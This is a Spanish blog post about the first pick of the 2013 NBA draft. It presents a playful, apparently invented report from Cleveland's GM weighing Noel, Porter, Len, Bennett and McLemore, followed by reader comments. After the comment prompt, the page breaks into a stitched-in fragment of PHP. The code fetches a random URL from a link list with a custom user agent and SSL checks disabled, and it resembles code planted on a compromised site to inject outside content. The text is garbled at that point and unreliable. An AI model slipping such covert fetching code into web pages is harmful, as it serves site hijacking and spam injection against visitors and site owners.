¿Quién será el número 1 del draft 2013?

26 de June de 2013 por Jose_Dantley

El número 1 generalmente define un draft. No es lo mismo el draft de LeBron que el draft de Olowakandi. Encontrar la primera elección del draft de 2013 se está convirtiendo en una tarea de locos para Chris Grant, el GM de Cleveland. El peculiar dueño de los Cavs, Dan Gilbert, le ha dado a Grant órdenes claras: “draftea a quien quieras, pero quiero entrar ya en playoffs”.

Imaginad que tenéis el número 1 de este año. ¿Cuál sería vuestro proceso de elección? ¿Hasta que punto tendríais en cuenta las necesidades de posición? ¿Influirá en vuestra decisión algún informe médico que diga que el jugador no empezará la temporada o os preocupará solo si la lesión deja secuelas? ¿Preferiríais vender el pick aún a sabiendas que no está demasiado valorado? ¿Iréis a lo seguro o arriesgaréis buscando un segundo jugador franquicia?

Algunos tenemos la suerte de tener un número 1 este año en alguna que otra fantasy, así que hemos pedido un informe detallado al mismísimo Chris Grant. Este es su informe traducido al español:

De: Chris Grant
A: Blog.tjnba.com
Fecha: 26 de junio de 2013

Asunto: Elección del número 1

Estimado Sr. Dantley

Como me has solicitado, aquí tienes mi informe sobre la elección del número 1 del draft del jueves. Espero que entiendas que temo por mi puesto de trabajo, así que si tienes alguna idea, sería bienvenida.

Hemos reducido la búsqueda a Noel, Porter, Len, Bennett y McLemore. 

Nerlens Noel

Sí: Puede tener el mayor impacto defensivo en la zona desde que se retiró Dikembe Mutombo. Su ética de trabajo es impresionante. Es humilde, trabajador, juega en equipo. Con él en el equipo nos podemos permitir tener un interior muy ofensivo aunque tenga algún problema defensivo. Es candidato desde el segundo año a DPOY.

No: Quizá tendrá que jugar de 4 donde ya tenemos a Thompson, lo que nos haría quedar mal. Ofensivamente no tiene nada nada más allá de los 2 metros. No tiene movimientos.

Informe médico: Dos lesiones graves de rodilla cuando no ha cumplido los 20. Nuestro médico nos asegura que la rehabilitación marcha bien y que en diciembre o enero estará disponible.

Otto Porter

Sí: Inteligente, jugador de equipo, buena curva de aprendizaje. Gran ética de trabajo. Ha mejorado sus porcentajes de tiro. Buena altura para un small forward. Buen reboteador. Nos hace falta un 3 desesperadamente. Informe médico limpio.

No: ¿Es Battier su techo máximo? No parece capaz de crearse su propio tiro. No penetra. Defiende bien las líneas de pase, no pierde la posición, pero ¿tiene fuerza para defender a un 3 poderoso?  No me lo imagino alcanzando el nivel de un Paul George o Kawhi Leonard.

Alex Len

Sí: 7 pies holgados. Fuerte. Ágil –fue gimnasta de niño-, rápido. Aunque aún no llega a ese nivel, parece tener potencial de desarrollar un buen tiro. Tiene algunos movimientos ofensivos interesantes y capacidad física para poder desarrollar más su arsenal ofensivo. Frente a Nerlens Noel y Mason Plumlee hizo los mejores partidos. Aguanta bien la posición en defensa e intimida.

No: Sus números son pésimos. Si con esas condiciones físicas no ha dominado en la NCAA, ¿a cuántos años está de dominar en la NBA si alguna vez lo hace? Dominó a Noel y Plumlee, ¿indica eso que tiene tendencia a vaguear si no se motiva o solo fueron partidos aislados? Es nulo en el apartado de robos. En 38 partidos esta temporada ha robado 8 bolas –no es ninguna errata. Noel ha tenido un partido de 6 robos y varios de 4.

Informe médico: Fractura de fatiga en el pie. Me viene a la cabeza Yao Ming. Además, existe la posibilidad de que se le hubiera agravado por jugar lesionado y recibir un mal tratamiento en Maryland. Volverá alrededor de noviembre.

Anthony Bennett

Sí: Las proyecciones apuntan a que puede ser el mejor anotador interior de este draft. Compensa la falta de estatura con una buena envergadura. Buen reboteador. Tiene tiro y pudiera desarrollarlo aún más. Fuerte sin perder agilidad.

No: Derrick Williams, Beasley, Al Harrington. Hay demasiados ejemplos de power forwards que se quedan cortos de estatura y sufren –también los hay de lo contrario, pero es un riesgo. Veo difícil que juegue de 3. No tiene velocidad para ello. En defensa se deja ir.

Informe médico: Ha tenido una operación en el manguito rotador del hombro izquierdo. Volverá alrededor de finales de septiembre o primeros de octubre. No parece que vaya a dejar secuelas.

Ben McLemore

Sí: Pagaría por verlo elevarse en el tiro. Puede llegar a ser uno de los tiradores más eficientes de la historia. Que llegue a un 55% en tiros de 2, 40% en triples y 90% en tiros libres en la NBA está a su alcance. Muy atlético. Bueno en transición. Muestra potencial en defensa. Sin problemas médicos.

No: Limitado en movimientos ofensivos. Sangre de horchata. No es un líder. No va a la línea de tiros libres, que con el ejemplo del año de Harden se ve más necesario que nunca para un 2. No lo ha hecho bien en workouts. ¿Cómo justificamos haber drafteado a Waiters en año pasado?

Conclusión

Quiero vender la ronda. Con los otros picks podemos sacar a un buen center suplente e incluso algún otro jugador que nos de minutos y buscar nuestra mejora en el mercado de agente libre. Pero ni Cleveland es atractivo para los agentes libres, ni nos dan nada interesante por el pick, así que nos veremos forzados a elegir. Aunque no sea lo mejor para el corto plazo, me arriesgaría con …

… bueno, con tanta tecnología de espionaje suelta, casi mejor que te lo digo el jueves, no vaya a ser que alguien quiera a Oladipo y nos compre el pick.

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    jajja, grandisimo articulo Sr. Dantley, enhorabuena, de lo mejor que he leido ultimamente.

    To Chris Grant:
    Hello Mr. Grant, si quieres quedarte con el pick, lo mas seguro que veo es que draftees a Otto Porter. Tu equipo necesita un 3 como el comer y un back-court Iriving-Waiters-Porter estaría muy bien para los años venideros.
    Si por contra tiene algun indicio en que Lebron pudiera volver a casa en 2014, lo mejor que puedes hacer es draftear a Noel y empaquetarlo con Varejao y Alonzo Gee ú otros picks por algun hombre alto, vease Aldridge, Al Jefferson ó el mismo Pau Gasol.
    Su equipo me cae como el culo, pero un Irving-Waiters-James-Thompson-Pau para la 2013-14 sería acojonantemente bueno de ver y disfrutar.

      Citar

  2. Denise dice:
    #2

    para la 2013-14 sería acojonantemente bueno de ver y disfrutar.

    Para la 2014-2015, excuse me por el error Sr. Grant

      Citar

  3. Ruxixón dice:
    #3

    Vaya marronazo que tienes encima Mr.Grant xDD

    Pensaba que Cleveland no tendría prisa en montar un equipo fuerte y ahí si encaja Noel,porque además les permitiría pillar cacho en el draft 2014,pero por los últimos rumores,preguntando por Love,Pierce o Aldridge,parece que quieren montar un equipo competitivo a la de ya así que juntar Noel + Varejao en la pintura es una temeridad.Yo apuesto a que traspasais y otro equipo escoge a Noel en el 1.

      Citar

  4. Sancho88 dice:
    #4

    Me parece que lo que dice Denise tiene bastante sentido, el traspaso de todo el pack a Lakers a cambio de Pau, y el próximo verano ir a por LeBron

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>